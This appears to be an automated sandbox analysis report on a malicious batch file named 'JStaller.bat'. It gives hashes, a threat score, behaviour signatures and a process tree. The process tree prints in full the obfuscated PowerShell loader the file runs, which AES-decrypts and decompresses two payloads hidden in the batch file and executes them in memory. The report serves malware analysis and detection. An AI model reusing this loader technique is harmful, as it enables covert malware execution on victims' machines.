Analysis
-
max time kernel
118s -
max time network
119s -
platform
windows7_x64 -
resource
win7-20240729-en -
resource tags
arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system -
submitted
02/03/2025, 03:40
Static task
static1
Behavioral task
behavioral1
Sample
JStaller.bat
Resource
win7-20240729-en
4 signatures
150 seconds
General
-
Target
JStaller.bat
-
Size
836KB
-
MD5
2686275418180ce5c188c5baf0427da9
-
SHA1
764d86b850f03bc2a4fa88eaa9e4434ebe39ff54
-
SHA256
953405057021d4ff8844aaa231590871e03cf136e50b2f5e758853ca76802481
-
SHA512
a048d3251e0af5f1acf39f855a2226b82ca956dc826c4730279408e6cbc38b83ff7bfac5527c429ca39bf98a4a2b4571c853e87bd3554dbaf8b9f926090d8bb4
-
SSDEEP
24576:0Fz47fYHX8qCwPSCuV4LTjgltYVk39I1V+JV4BmU:0GoCwrfjgLU+Jwp
Score
8/10
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 2688 powershell.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2688 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2688 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 2328 wrote to memory of 2648 2328 cmd.exe 31 PID 2328 wrote to memory of 2648 2328 cmd.exe 31 PID 2328 wrote to memory of 2648 2328 cmd.exe 31 PID 2328 wrote to memory of 2688 2328 cmd.exe 32 PID 2328 wrote to memory of 2688 2328 cmd.exe 32 PID 2328 wrote to memory of 2688 2328 cmd.exe 32
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\JStaller.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2328 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('vOcu+PPw1ezKfKMmDbKrjXMXfbfGAsmHoPCf3KMx2t4='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('tpBIhqEx6U+QivN3l3d4ag=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $IDQxi=New-Object System.IO.MemoryStream(,$param_var); $bhHOm=New-Object System.IO.MemoryStream; $GZCrW=New-Object System.IO.Compression.GZipStream($IDQxi, [IO.Compression.CompressionMode]::Decompress); $GZCrW.CopyTo($bhHOm); $GZCrW.Dispose(); $IDQxi.Dispose(); $bhHOm.Dispose(); $bhHOm.ToArray();}function execute_function($param_var,$param2_var){ $OoVOu=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $DXpNS=$OoVOu.EntryPoint; $DXpNS.Invoke($null, $param2_var);}$nVBsr = 'C:\Users\Admin\AppData\Local\Temp\JStaller.bat';$host.UI.RawUI.WindowTitle = $nVBsr;$iisly=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($nVBsr).Split([Environment]::NewLine);foreach ($BtcCw in $iisly) { if ($BtcCw.StartsWith('coKHtsmTeuelHQULHXBz')) { $fZysd=$BtcCw.Substring(20); break; }}$payloads_var=[string[]]$fZysd.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "2⤵PID:2648
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2688
-